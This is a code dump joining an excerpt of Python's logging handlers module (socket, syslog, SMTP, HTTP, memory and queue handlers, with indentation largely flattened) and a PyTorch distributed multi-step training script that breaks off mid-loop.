a streaming socket. The socket is kept open across logging calls.
If the peer resets it, an attempt is made to reconnect on the next call.
The pickle which is sent is that of the LogRecord's attribute dictionary
(__dict__), so that the receiver does not need to have the logging module
installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
The attribute 'closeOnError' is set to 1 - which means that if
a socket error occurs, the socket is silently closed and then
reopened on the next logging call.
"""
logging.Handler.__init__(self)
self.host = host
self.port = port
self.sock = None
self.closeOnError = 0
self.retryTime = None
#
# Exponential backoff parameters.
#
self.retryStart = 1.0
self.retryMax = 30.0
self.retryFactor = 2.0
def makeSocket(self, timeout=1):
"""
A factory method which allows subclasses to define the precise
type of socket they want.
"""
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
if hasattr(s, 'settimeout'):
s.settimeout(timeout)
s.connect((self.host, self.port))
return s
def createSocket(self):
"""
Try to create a socket, using an exponential backoff with
a max retry time. Thanks to Robert Olson for the original patch
(SF #815911) which has been slightly refactored.
"""
now = time.time()
# Either retryTime is None, in which case this
# is the first time back after a disconnect, or
# we've waited long enough.
if self.retryTime is None:
attempt = 1
else:
attempt = (now >= self.retryTime)
if attempt:
try:
self.sock = self.makeSocket()
self.retryTime = None # next time, no delay before trying
except socket.error:
#Creation failed, so set the retry time and return.
if self.retryTime is None:
self.retryPeriod = self.retryStart
else:
self.retryPeriod = self.retryPeriod * self.retryFactor
if self.retryPeriod > self.retryMax:
self.retryPeriod = self.retryMax
self.retryTime = now + self.retryPeriod
def send(self, s):
"""
Send a pickled string to the socket.
This function allows for partial sends which can happen when the
network is busy.
"""
if self.sock is None:
self.createSocket()
#self.sock can be None either because we haven't reached the retry
#time yet, or because we have reached the retry time and retried,
#but are still unable to connect.
if self.sock:
try:
if hasattr(self.sock, "sendall"):
self.sock.sendall(s)
else:
sentsofar = 0
left = len(s)
while left > 0:
sent = self.sock.send(s[sentsofar:])
sentsofar = sentsofar + sent
left = left - sent
except socket.error:
self.sock.close()
self.sock = None # so we can call createSocket next time
def makePickle(self, record):
"""
Pickles the record in binary format with a length prefix, and
returns it ready for transmission across the socket.
"""
ei = record.exc_info
if ei:
dummy = self.format(record) # just to get traceback text into record.exc_text
record.exc_info = None # to avoid Unpickleable error
s = pickle.dumps(record.__dict__, 1)
if ei:
record.exc_info = ei # for next handler
slen = struct.pack(">L", len(s))
return slen + s
def handleError(self, record):
"""
Handle an error during logging.
An error has occurred during logging. Most likely cause -
connection lost. Close the socket so that we can retry on the
next event.
"""
if self.closeOnError and self.sock:
self.sock.close()
self.sock = None #try to reconnect next time
else:
logging.Handler.handleError(self, record)
def emit(self, record):
"""
Emit a record.
Pickles the record and writes it to the socket in binary format.
If there is an error with the socket, silently drop the packet.
If there was a problem with the socket, re-establishes the
socket.
"""
try:
s = self.makePickle(record)
self.send(s)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
"""
Closes the socket.
"""
if self.sock:
self.sock.close()
self.sock = None
logging.Handler.close(self)
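# Illustrative sketch (added, not part of the original module): the SocketHandler
# docstring above notes that a receiver can rebuild LogRecords with makeLogRecord.
# The helper below shows one minimal way to do that; the host/port defaults and the
# function name are assumptions made for the example, and it is never called here.
def _example_socket_record_receiver(host='localhost', port=9020):
    """Accept one connection and re-emit the pickled records it sends."""
    import socket, struct, pickle, logging
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((host, port))
    listener.listen(1)
    conn, _ = listener.accept()
    try:
        while True:
            header = conn.recv(4)          # ">L" length prefix written by makePickle()
            if len(header) < 4:
                break
            slen = struct.unpack('>L', header)[0]
            data = b''
            while len(data) < slen:
                chunk = conn.recv(slen - len(data))
                if not chunk:
                    return
                data += chunk
            record = logging.makeLogRecord(pickle.loads(data))
            logging.getLogger(record.name).handle(record)
    finally:
        conn.close()
        listener.close()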
class DatagramHandler(SocketHandler):
"""
A handler class which writes logging records, in pickle format, to
a datagram socket. The pickle which is sent is that of the LogRecord's
attribute dictionary (__dict__), so that the receiver does not need to
have the logging module installed in order to process the logging event.
To unpickle the record at the receiving end into a LogRecord, use the
makeLogRecord function.
"""
def __init__(self, host, port):
"""
Initializes the handler with a specific host address and port.
"""
SocketHandler.__init__(self, host, port)
self.closeOnError = 0
def makeSocket(self):
"""
The factory method of SocketHandler is here overridden to create
a UDP socket (SOCK_DGRAM).
"""
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
return s
def send(self, s):
"""
Send a pickled string to a socket.
This function no longer allows for partial sends which can happen
when the network is busy - UDP does not guarantee delivery and
can deliver packets out of sequence.
"""
if self.sock is None:
self.createSocket()
self.sock.sendto(s, (self.host, self.port))
class SysLogHandler(logging.Handler):
"""
A handler class which sends formatted logging records to a syslog
server. Based on Sam Rushing's syslog module:
http://www.nightmare.com/squirl/python-ext/misc/syslog.py
Contributed by Nicolas Untz (after which minor refactoring changes
have been made).
"""
# from <linux/sys/syslog.h>:
# ======================================================================
# priorities/facilities are encoded into a single 32-bit quantity, where
# the bottom 3 bits are the priority (0-7) and the top 28 bits are the
# facility (0-big number). Both the priorities and the facilities map
# roughly one-to-one to strings in the syslogd(8) source code. This
# mapping is included in this file.
#
# priorities (these are ordered)
LOG_EMERG = 0 # system is unusable
LOG_ALERT = 1 # action must be taken immediately
LOG_CRIT = 2 # critical conditions
LOG_ERR = 3 # error conditions
LOG_WARNING = 4 # warning conditions
LOG_NOTICE = 5 # normal but significant condition
LOG_INFO = 6 # informational
LOG_DEBUG = 7 # debug-level messages
# facility codes
LOG_KERN = 0 # kernel messages
LOG_USER = 1 # random user-level messages
LOG_MAIL = 2 # mail system
LOG_DAEMON = 3 # system daemons
LOG_AUTH = 4 # security/authorization messages
LOG_SYSLOG = 5 # messages generated internally by syslogd
LOG_LPR = 6 # line printer subsystem
LOG_NEWS = 7 # network news subsystem
LOG_UUCP = 8 # UUCP subsystem
LOG_CRON = 9 # clock daemon
LOG_AUTHPRIV = 10 # security/authorization messages (private)
LOG_FTP = 11 # FTP daemon
# other codes through 15 reserved for system use
LOG_LOCAL0 = 16 # reserved for local use
LOG_LOCAL1 = 17 # reserved for local use
LOG_LOCAL2 = 18 # reserved for local use
LOG_LOCAL3 = 19 # reserved for local use
LOG_LOCAL4 = 20 # reserved for local use
LOG_LOCAL5 = 21 # reserved for local use
LOG_LOCAL6 = 22 # reserved for local use
LOG_LOCAL7 = 23 # reserved for local use
priority_names = {
"alert": LOG_ALERT,
"crit": LOG_CRIT,
"critical": LOG_CRIT,
"debug": LOG_DEBUG,
"emerg": LOG_EMERG,
"err": LOG_ERR,
"error": LOG_ERR, # DEPRECATED
"info": LOG_INFO,
"notice": LOG_NOTICE,
"panic": LOG_EMERG, # DEPRECATED
"warn": LOG_WARNING, # DEPRECATED
"warning": LOG_WARNING,
}
facility_names = {
"auth": LOG_AUTH,
"authpriv": LOG_AUTHPRIV,
"cron": LOG_CRON,
"daemon": LOG_DAEMON,
"ftp": LOG_FTP,
"kern": LOG_KERN,
"lpr": LOG_LPR,
"mail": LOG_MAIL,
"news": LOG_NEWS,
"security": LOG_AUTH, # DEPRECATED
"syslog": LOG_SYSLOG,
"user": LOG_USER,
"uucp": LOG_UUCP,
"local0": LOG_LOCAL0,
"local1": LOG_LOCAL1,
"local2": LOG_LOCAL2,
"local3": LOG_LOCAL3,
"local4": LOG_LOCAL4,
"local5": LOG_LOCAL5,
"local6": LOG_LOCAL6,
"local7": LOG_LOCAL7,
}
#The map below appears to be trivially lowercasing the key. However,
#there's more to it than meets the eye - in some locales, lowercasing
#gives unexpected results. See SF #1524081: in the Turkish locale,
#"INFO".lower() != "info"
priority_map = {
"DEBUG" : "debug",
"INFO" : "info",
"WARNING" : "warning",
"ERROR" : "error",
"CRITICAL" : "critical"
}
def __init__(self, address=('localhost', SYSLOG_UDP_PORT),
facility=LOG_USER, socktype=socket.SOCK_DGRAM):
"""
Initialize a handler.
If address is specified as a string, a UNIX socket is used. To log to a
local syslogd, "SysLogHandler(address="/dev/log")" can be used.
If facility is not specified, LOG_USER is used.
"""
logging.Handler.__init__(self)
self.address = address
self.facility = facility
self.socktype = socktype
if isinstance(address, str):
self.unixsocket = 1
self._connect_unixsocket(address)
else:
self.unixsocket = 0
self.socket = socket.socket(socket.AF_INET, socktype)
if socktype == socket.SOCK_STREAM:
self.socket.connect(address)
self.formatter = None
def _connect_unixsocket(self, address):
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_DGRAM)
# syslog may require either DGRAM or STREAM sockets
try:
self.socket.connect(address)
except socket.error:
self.socket.close()
self.socket = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
self.socket.connect(address)
def encodePriority(self, facility, priority):
"""
Encode the facility and priority. You can pass in strings or
integers - if strings are passed, the facility_names and
priority_names mapping dictionaries are used to convert them to
integers.
"""
if isinstance(facility, str):
facility = self.facility_names[facility]
if isinstance(priority, str):
priority = self.priority_names[priority]
return (facility << 3) | priority
def close (self):
"""
Closes the socket.
"""
if self.unixsocket:
self.socket.close()
logging.Handler.close(self)
def mapPriority(self, levelName):
"""
Map a logging level name to a key in the priority_names map.
This is useful in two scenarios: when custom levels are being
used, and in the case where you can't do a straightforward
mapping by lowercasing the logging level name because of locale-
specific issues (see SF #1524081).
"""
return self.priority_map.get(levelName, "warning")
def emit(self, record):
"""
Emit a record.
The record is formatted, and then sent to the syslog server. If
exception information is present, it is NOT sent to the server.
"""
msg = self.format(record) + '\000'
"""
We need to convert record level to lowercase, maybe this will
change in the future.
"""
prio = '<%d>' % self.encodePriority(self.facility,
self.mapPriority(record.levelname))
prio = prio.encode('utf-8')
# Message is a string. Convert to bytes as required by RFC 5424
msg = msg.encode('utf-8')
if codecs:
msg = codecs.BOM_UTF8 + msg
msg = prio + msg
try:
if self.unixsocket:
try:
self.socket.send(msg)
except socket.error:
self._connect_unixsocket(self.address)
self.socket.send(msg)
elif self.socktype == socket.SOCK_DGRAM:
self.socket.sendto(msg, self.address)
else:
self.socket.sendall(msg)
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
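# Added note: as the comment block at the top of SysLogHandler explains, facility and
# priority are packed as (facility << 3) | priority, so e.g. facility "user" (1) with
# priority "info" (6) encodes to (1 << 3) | 6 == 14. The helper below is an
# illustrative sketch of typical wiring; the "/dev/log" address comes from the
# __init__ docstring, while the logger name is an assumption, and it is never called.
def _example_syslog_logger():
    import logging
    logger = logging.getLogger('example.syslog')
    logger.setLevel(logging.INFO)
    logger.addHandler(SysLogHandler(address='/dev/log', facility=SysLogHandler.LOG_USER))
    return logger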
class SMTPHandler(logging.Handler):
"""
A handler class which sends an SMTP email for each logging event.
"""
def __init__(self, mailhost, fromaddr, toaddrs, subject,
credentials=None, secure=None):
"""
Initialize the handler.
Initialize the instance with the from and to addresses and subject
line of the email. To specify a non-standard SMTP port, use the
(host, port) tuple format for the mailhost argument. To specify
authentication credentials, supply a (username, password) tuple
for the credentials argument. To specify the use of a secure
protocol (TLS), pass in a tuple for the secure argument. This will
only be used when authentication credentials are supplied. The tuple
will be either an empty tuple, or a single-value tuple with the name
of a keyfile, or a 2-value tuple with the names of the keyfile and
certificate file. (This tuple is passed to the `starttls` method).
"""
logging.Handler.__init__(self)
if isinstance(mailhost, tuple):
self.mailhost, self.mailport = mailhost
else:
self.mailhost, self.mailport = mailhost, None
if isinstance(credentials, tuple):
self.username, self.password = credentials
else:
self.username = None
self.fromaddr = fromaddr
if isinstance(toaddrs, str):
toaddrs = [toaddrs]
self.toaddrs = toaddrs
self.subject = subject
self.secure = secure
def getSubject(self, record):
"""
Determine the subject for the email.
If you want to specify a subject line which is record-dependent,
override this method.
"""
return self.subject
def emit(self, record):
"""
Emit a record.
Format the record and send it to the specified addressees.
"""
try:
import smtplib
from email.utils import formatdate
port = self.mailport
if not port:
port = smtplib.SMTP_PORT
smtp = smtplib.SMTP(self.mailhost, port)
msg = self.format(record)
msg = "From: %s\r\nTo: %s\r\nSubject: %s\r\nDate: %s\r\n\r\n%s" % (
self.fromaddr,
",".join(self.toaddrs),
self.getSubject(record),
formatdate(), msg)
if self.username:
if self.secure is not None:
smtp.ehlo()
smtp.starttls(*self.secure)
smtp.ehlo()
smtp.login(self.username, self.password)
smtp.sendmail(self.fromaddr, self.toaddrs, msg)
smtp.quit()
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
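# Illustrative sketch (added, not part of the original module): attaching SMTPHandler
# so that ERROR-and-above records are mailed out. The mail host, addresses and subject
# are placeholder assumptions, not values from the original code; never called here.
def _example_smtp_logger():
    import logging
    handler = SMTPHandler(mailhost=('smtp.example.com', 25),
                          fromaddr='app@example.com',
                          toaddrs=['ops@example.com'],
                          subject='Application error')
    handler.setLevel(logging.ERROR)
    logger = logging.getLogger('example.smtp')
    logger.addHandler(handler)
    return logger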
class NTEventLogHandler(logging.Handler):
"""
A handler class which sends events to the NT Event Log. Adds a
registry entry for the specified application name. If no dllname is
provided, win32service.pyd (which contains some basic message
placeholders) is used. Note that use of these placeholders will make
your event logs big, as the entire message source is held in the log.
If you want slimmer logs, you have to pass in the name of your own DLL
which contains the message definitions you want to use in the event log.
"""
def __init__(self, appname, dllname=None, logtype="Application"):
logging.Handler.__init__(self)
try:
import win32evtlogutil, win32evtlog
self.appname = appname
self._welu = win32evtlogutil
if not dllname:
dllname = os.path.split(self._welu.__file__)
dllname = os.path.split(dllname[0])
dllname = os.path.join(dllname[0], r'win32service.pyd')
self.dllname = dllname
self.logtype = logtype
self._welu.AddSourceToRegistry(appname, dllname, logtype)
self.deftype = win32evtlog.EVENTLOG_ERROR_TYPE
self.typemap = {
logging.DEBUG : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.INFO : win32evtlog.EVENTLOG_INFORMATION_TYPE,
logging.WARNING : win32evtlog.EVENTLOG_WARNING_TYPE,
logging.ERROR : win32evtlog.EVENTLOG_ERROR_TYPE,
logging.CRITICAL: win32evtlog.EVENTLOG_ERROR_TYPE,
}
except ImportError:
print("The Python Win32 extensions for NT (service, event "\
"logging) appear not to be available.")
self._welu = None
def getMessageID(self, record):
"""
Return the message ID for the event record. If you are using your
own messages, you could do this by having the msg passed to the
logger being an ID rather than a formatting string. Then, in here,
you could use a dictionary lookup to get the message ID. This
version returns 1, which is the base message ID in win32service.pyd.
"""
return 1
def getEventCategory(self, record):
"""
Return the event category for the record.
Override this if you want to specify your own categories. This version
returns 0.
"""
return 0
def getEventType(self, record):
"""
Return the event type for the record.
Override this if you want to specify your own types. This version does
a mapping using the handler's typemap attribute, which is set up in
__init__() to a dictionary which contains mappings for DEBUG, INFO,
WARNING, ERROR and CRITICAL. If you are using your own levels you will
either need to override this method or place a suitable dictionary in
the handler's typemap attribute.
"""
return self.typemap.get(record.levelno, self.deftype)
def emit(self, record):
"""
Emit a record.
Determine the message ID, event category and event type. Then
log the message in the NT event log.
"""
if self._welu:
try:
id = self.getMessageID(record)
cat = self.getEventCategory(record)
type = self.getEventType(record)
msg = self.format(record)
self._welu.ReportEvent(self.appname, id, cat, type, [msg])
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
def close(self):
"""
Clean up this handler.
You can remove the application name from the registry as a
source of event log entries. However, if you do this, you will
not be able to see the events as you intended in the Event Log
Viewer - it needs to be able to access the registry to get the
DLL name.
"""
#self._welu.RemoveSourceFromRegistry(self.appname, self.logtype)
logging.Handler.close(self)
class HTTPHandler(logging.Handler):
"""
A class which sends records to a Web server, using either GET or
POST semantics.
"""
def __init__(self, host, url, method="GET", secure=False, credentials=None):
"""
Initialize the instance with the host, the request URL, and the method
("GET" or "POST")
"""
logging.Handler.__init__(self)
method = method.upper()
if method not in ["GET", "POST"]:
raise ValueError("method must be GET or POST")
self.host = host
self.url = url
self.method = method
self.secure = secure
self.credentials = credentials
def mapLogRecord(self, record):
"""
Default implementation of mapping the log record into a dict
that is sent as the CGI data. Overwrite in your class.
Contributed by Franz Glasner.
"""
return record.__dict__
def emit(self, record):
"""
Emit a record.
Send the record to the Web server as a percent-encoded dictionary
"""
try:
import http.client, urllib.parse
host = self.host
if self.secure:
h = http.client.HTTPSConnection(host)
else:
h = http.client.HTTPConnection(host)
url = self.url
data = urllib.parse.urlencode(self.mapLogRecord(record))
if self.method == "GET":
if (url.find('?') >= 0):
sep = '&'
else:
sep = '?'
url = url + "%c%s" % (sep, data)
h.putrequest(self.method, url)
# support multiple hosts on one IP address...
# need to strip optional :port from host, if present
i = host.find(":")
if i >= 0:
host = host[:i]
h.putheader("Host", host)
if self.method == "POST":
h.putheader("Content-type",
"application/x-www-form-urlencoded")
h.putheader("Content-length", str(len(data)))
if self.credentials:
import base64
                s = ('%s:%s' % self.credentials).encode('utf-8')
                s = 'Basic ' + base64.b64encode(s).strip().decode('ascii')
h.putheader('Authorization', s)
h.endheaders(data if self.method == "POST" else None)
h.getresponse() #can't do anything with the result
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
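# Illustrative sketch (added, not part of the original module): mapLogRecord() returns
# the record's __dict__, which emit() percent-encodes and sends via GET or POST. The
# host and URL below are placeholder assumptions; the helper is never called here.
def _example_http_logger():
    import logging
    handler = HTTPHandler('localhost:8080', '/log', method='POST')
    logger = logging.getLogger('example.http')
    logger.addHandler(handler)
    return logger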
class BufferingHandler(logging.Handler):
"""
A handler class which buffers logging records in memory. Whenever each
record is added to the buffer, a check is made to see if the buffer should
be flushed. If it should, then flush() is expected to do what's needed.
"""
def __init__(self, capacity):
"""
Initialize the handler with the buffer size.
"""
logging.Handler.__init__(self)
self.capacity = capacity
self.buffer = []
def shouldFlush(self, record):
"""
Should the handler flush its buffer?
Returns true if the buffer is up to capacity. This method can be
overridden to implement custom flushing strategies.
"""
return (len(self.buffer) >= self.capacity)
def emit(self, record):
"""
Emit a record.
Append the record. If shouldFlush() tells us to, call flush() to process
the buffer.
"""
self.buffer.append(record)
if self.shouldFlush(record):
self.flush()
def flush(self):
"""
Override to implement custom flushing behaviour.
This version just zaps the buffer to empty.
"""
self.buffer = []
def close(self):
"""
Close the handler.
This version just flushes and chains to the parent class' close().
"""
self.flush()
logging.Handler.close(self)
class MemoryHandler(BufferingHandler):
"""
A handler class which buffers logging records in memory, periodically
flushing them to a target handler. Flushing occurs whenever the buffer
is full, or when an event of a certain severity or greater is seen.
"""
def __init__(self, capacity, flushLevel=logging.ERROR, target=None):
"""
Initialize the handler with the buffer size, the level at which
flushing should occur and an optional target.
Note that without a target being set either here or via setTarget(),
a MemoryHandler is no use to anyone!
"""
BufferingHandler.__init__(self, capacity)
self.flushLevel = flushLevel
self.target = target
def shouldFlush(self, record):
"""
Check for buffer full or a record at the flushLevel or higher.
"""
return (len(self.buffer) >= self.capacity) or \
(record.levelno >= self.flushLevel)
def setTarget(self, target):
"""
Set the target handler for this handler.
"""
self.target = target
def flush(self):
"""
For a MemoryHandler, flushing means just sending the buffered
records to the target, if there is one. Override if you want
different behaviour.
The record buffer is also cleared by this operation.
"""
if self.target:
for record in self.buffer:
self.target.handle(record)
self.buffer = []
def close(self):
"""
Flush, set the target to None and lose the buffer.
"""
self.flush()
self.target = None
BufferingHandler.close(self)
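# Illustrative sketch (added, not part of the original module): MemoryHandler buffers
# records and forwards them to its target when the buffer reaches capacity or a record
# at flushLevel (ERROR by default) arrives. The capacity and logger name used below
# are assumptions for the example; the helper is never called here.
def _example_memory_logger():
    import logging
    target = logging.StreamHandler()
    handler = MemoryHandler(capacity=100, flushLevel=logging.ERROR, target=target)
    logger = logging.getLogger('example.memory')
    logger.addHandler(handler)
    return logger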
class QueueHandler(logging.Handler):
"""
This handler sends events to a queue. Typically, it would be used together
with a multiprocessing Queue to centralise logging to file in one process
(in a multi-process application), so as to avoid file write contention
between processes.
This code is new in Python 3.2, but this class can be copy pasted into
user code for use with earlier Python versions.
"""
def __init__(self, queue):
"""
Initialise an instance, using the passed queue.
"""
logging.Handler.__init__(self)
self.queue = queue
def enqueue(self, record):
"""
Enqueue a record.
The base implementation uses put_nowait. You may want to override
this method if you want to use blocking, timeouts or custom queue
implementations.
"""
self.queue.put_nowait(record)
def prepare(self, record):
"""
Prepares a record for queuing. The object returned by this method is
enqueued.
The base implementation formats the record to merge the message
and arguments, and removes unpickleable items from the record
in-place.
You might want to override this method if you want to convert
the record to a dict or JSON string, or send a modified copy
of the record while leaving the original intact.
"""
# The format operation gets traceback text into record.exc_text
# (if there's exception data), and also puts the message into
# record.message. We can then use this to replace the original
# msg + args, as these might be unpickleable. We also zap the
# exc_info attribute, as it's no longer needed and, if not None,
# will typically not be pickleable.
self.format(record)
record.msg = record.message
record.args = None
record.exc_info = None
return record
def emit(self, record):
"""
Emit a record.
Writes the LogRecord to the queue, preparing it for pickling first.
"""
try:
self.enqueue(self.prepare(record))
except (KeyboardInterrupt, SystemExit):
raise
except:
self.handleError(record)
class QueueListener(object):
"""
This class implements an internal threaded listener which watches for
LogRecords being added to a queue, removes them and passes them to a
list of handlers for processing.
"""
_sentinel = None
def __init__(self, queue, *handlers):
"""
Initialise an instance with the specified queue and
handlers.
"""
self.queue = queue
self.handlers = handlers
self._stop = threading.Event()
self._thread = None
def dequeue(self, block):
"""
Dequeue a record and return it, optionally blocking.
The base implementation uses get. You may want to override this method
if you want to use timeouts or work with custom queue implementations.
"""
return self.queue.get(block)
def start(self):
"""
Start the listener.
This starts up a background thread to monitor the queue for
LogRecords to process.
"""
self._thread = t = threading.Thread(target=self._monitor)
t.setDaemon(True)
t.start()
def prepare(self , record):
"""
Prepare a record for handling.
This method just returns the passed-in record. You may want to
override this method if you need to do any custom marshalling or
manipulation of the record before passing it to the handlers.
"""
return record
def handle(self, record):
"""
Handle a record.
This just loops through the handlers offering them the record
to handle.
"""
record = self.prepare(record)
for handler in self.handlers:
handler.handle(record)
def _monitor(self):
"""
Monitor the queue for records, and ask the handler
to deal with them.
This method runs on a separate, internal thread.
The thread will terminate if it sees a sentinel object in the queue.
"""
q = self.queue
has_task_done = hasattr(q, 'task_done')
while not self._stop.isSet():
try:
record = self.dequeue(True)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
pass
# There might still be records in the queue.
while True:
try:
record = self.dequeue(False)
if record is self._sentinel:
break
self.handle(record)
if has_task_done:
q.task_done()
except queue.Empty:
break
def stop(self):
"""
Stop the listener.
This asks the thread to terminate, and then waits for it to do so.
Note that if you don't call this before your application exits, there
may be some records still left on the queue, which won't be processed.
"""
self._stop.set()
self.queue.put_nowait(self._sentinel)
self._thread.join()
self._thread = None
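# Illustrative sketch (added, not part of the original module): the QueueHandler
# docstring describes centralising logging through a queue. A single-process wiring is
# shown below; in a multi-process setup the queue would typically be a
# multiprocessing.Queue shared with the workers. Names and levels are assumptions for
# the example; the helper is never called here.
def _example_queue_logging():
    import logging, queue
    log_queue = queue.Queue()
    logger = logging.getLogger('example.queue')
    logger.setLevel(logging.INFO)
    logger.addHandler(QueueHandler(log_queue))       # producers only touch the queue
    listener = QueueListener(log_queue, logging.StreamHandler())
    listener.start()                                 # background thread drains the queue
    logger.info('routed through the queue')
    listener.stop()                                  # flushes remaining records and joins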
|
train_10step.py
|
import torch
import torch.nn as nn
import torch.nn.functional as F
import torch.optim as optim
import torch.distributed as dist
from torch.nn.parallel import DistributedDataParallel as DDP
import sys
import time
import math
import os
import random
import argparse
import numpy as np
torch.manual_seed(0)
class DataSet:
def __init__(self, data, len: int, nobs: int, nobs2: int, k: int):
self.data = data
self.len = len
self.nobs = nobs
self.nobs2 = nobs2
self.k = k
self.nf = nobs2 - nobs + 1
def __len__(self):
return self.len * self.nf
def __getitem__(self, index):
i = int(index/self.nf)
n = index % self.nf
return self.data[i,n:n+self.nobs,:]
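# Worked example for DataSet.__getitem__ (added comment; values match the __main__
# block below): with nobs=11 and nobs2=21, nf = 21 - 11 + 1 = 11 windows per
# trajectory, so index 25 maps to trajectory i = 25 // 11 = 2 and window offset
# n = 25 % 11 = 3, i.e. the slice data[2, 3:14, :].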
def save(fname, state, loss_t, loss_e):
path = fname+".pth"
torch.save(state, path)
np.savez(fname, loss_t, loss_e)
def average_gradients(model, size):
for param in model.parameters():
dist.all_reduce(param.grad.data, op=dist.ReduceOp.SUM)
param.grad.data /= size
def average_loss(loss, size):
dist.all_reduce(loss, op=dist.ReduceOp.SUM)
loss /= size
return loss
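# Added note: with rank_size workers, all_reduce(SUM) leaves every rank holding the
# sum of the per-rank values, so the division afterwards gives each rank the mean,
# e.g. for rank_size=4 and per-rank gradients g0..g3 every rank ends up with
# (g0 + g1 + g2 + g3) / 4.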
def training(myrank, rank_size, k, nobs, nobs2, data_t, data_e, ndata_t, ndata_e, batch_size_t, init, cp, double, debug, fix, nspin):
if debug:
print(myrank, "start training", flush=True)
nf = nobs2 - nobs + 1
nitr = 2
#path_net = "./train_1step_ens200_bsize4000.pth"
#path_net = "./train_1step_ens400_bsize4000.pth"
fname_pre = f"train_10step_ens{ndata_t}_bsize{batch_size_t}_init{init}"
if nspin != 100:
fname_pre = fname_pre + f"_nspin{nspin}"
if cp > 1:
path_net = fname_pre + f"_{cp-1}.pth"
else:
bs = {50: 125, 100: 250, 200: 2000, 400: 4000, 800: 4000}[ndata_t]
if nspin == 100:
path_net = f"./train_1step_ens{ndata_t}_bsize{bs}.pth"
else:
path_net = f"./train_1step_ens{ndata_t}_bsize{bs}_nspin{nspin}.pth"
if myrank==0:
print(f"pth file is {path_net}")
print(f"# of ensembles is {ndata_t}")
print(f"# of batch_size is {batch_size_t}")
print(f"init is {init}")
print(f"checkpoint count is {cp}")
print(f"rank_size is {rank_size}")
print(f"nspin is {nspin}")
if debug:
fname = "test"
else:
fname = fname_pre + f"_{cp}"
max_norm = 0.01
max_grad_norm = 0.01
if debug:
max_epoch = 10
else:
max_epoch = 50000
#max_epoch = 1000
#max_epoch = 500
#max_epoch = 1
batch_size_e = ndata_e * nf
batch_num_t = ndata_t * nf / batch_size_t
batch_num_e = ndata_e * nf / batch_size_e
loader_t = torch.utils.data.DataLoader(data_t, batch_size=batch_size_t//rank_size, shuffle=True)
loader_e = torch.utils.data.DataLoader(data_e, batch_size=batch_size_e//rank_size)
stat = torch.load(path_net)
if debug:
nint = 1
nint2 = 1
else:
nint = 10
nint2 = 500
#nint2 = 1000
if cp > 1:
path = fname_pre + f"_{cp-1}.npz"
npz = np.load(path)
loss_t = npz['arr_0']
loss_e = npz['arr_1']
else:
loss_t = np.zeros(int(max_epoch/nint+1))
loss_e = np.zeros(int(max_epoch/nint+1))
large = 999.9e5
if (cp > 1) and ('min' in stat.keys()):
min0 = stat['min']
else:
min0 = [large, 0, 0]
if (cp > 1) and ('epoch' in stat.keys()):
epoch_min = stat['epoch'] + 1
else:
epoch_min = 0
if torch.cuda.is_available():
device = torch.device(f"cuda:{myrank}")
else:
device = None
import net
net = net.Net(k, nitr, device=device, rank_size=rank_size)
if not init:
net.load_state_dict(stat['net'])
if double:
net = net.double()
if device:
net = net.to(device)
if rank_size > 1 and init:
net = DDP(net, device_ids=[myrank])
criterion = nn.MSELoss()
if init:
lr = 0.01 * batch_size_t / 1000
else:
lr = 0.001 * batch_size_t / 1000
# lr = 0.0002 * batch_size_t / 1000
optimizer = optim.Adam(net.parameters(), lr=lr)
#optimizer = optim.Adam(net.parameters(), lr=0.01)
#optimizer = optim.Adam(net.parameters(), lr=0.0001)
if cp > 1:
optimizer.load_state_dict(stat['opt'])
#scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.99)
scheduler = optim.lr_scheduler.StepLR(optimizer, step_size=1000, gamma=0.9)
if cp > 1:
scheduler.load_state_dict(stat['sch'])
if myrank==0:
print("start training", flush=True)
start = time.time()
min_tmp = large
unchange = 0
min = min0
for epoch in range(epoch_min, max_epoch):
if init:
net.train()
net.drop = True
elif fix:
# net.train()
# net.drop = False
net.eval()
net.drop = True
else:
net.eval()
net.drop = False
running_loss_t = 0.0
for data in loader_t:
#if debug and myrank==0:
# print("forward", epoch, flush=True)
optimizer.zero_grad()
if device:
data = data.to(device)
out = data[:,0,:]
#out.requires_grad = True
#tmp = out
loss = 0.0
lmsg = True
for n in range(nobs-1):
out = net(out)
target = data[:,n+1,:]
norm = criterion(out, target)
loss += norm
norm = norm.item()
#if debug:
# print(epoch, n, norm)
if norm >= max_norm:
if ( epoch > 10000 or debug ) and lmsg:
print("reducing norm", myrank, n, norm, max_norm, flush=True)
lmsg = False
out = target + ( out - target ) * ( max_norm / norm )
#if debug and myrank==0:
# print("backward", epoch, flush=True)
loss.backward()
if rank_size > 1:
#if debug and myrank==0:
# print("all reduce", epoch, flush=True)
if not init:
average_gradients(net, rank_size)
#print(epoch, myrank, loss.item())
loss = average_loss(loss, rank_size)
#if debug and myrank==0:
# print("optimizer", epoch, flush=True)
nn.utils.clip_grad_norm_(net.parameters(), max_grad_norm)
optimizer.step()
running_loss_t += loss.item()
scheduler.step()
if (epoch+1)%nint == 0 or epoch==0:
#print(torch.norm(tmp).item(), torch.norm(tmp.grad).item())
net.eval()
net.drop = False
#if debug and myrank==0:
# print("eval", epoch, flush=True)
with torch.no_grad():
running_loss_e = 0.0
for data in loader_e:
if device:
data = data.to(device)
loss = 0.0
out = data[:,0,:]
for n in range(nobs-1):
out = net(out)
norm = criterion(out, data[:,n+1,:])
loss += norm
#if debug:
# print(epoch, n, norm.item())
running_loss_e += loss.item()
if rank_size > 1:
running_loss_e = average_loss(torch.tensor(running_loss_e, device=device), rank_size).item()
l_t = running_loss_t / ( batch_num_t * (nobs-1) )
l_e = running_loss_e / ( batch_num_e * (nobs-1) )
if myrank == 0:
loss_t[int((epoch+1)/nint)] = l_t
loss_e[int((epoch+1)/nint)] = l_e
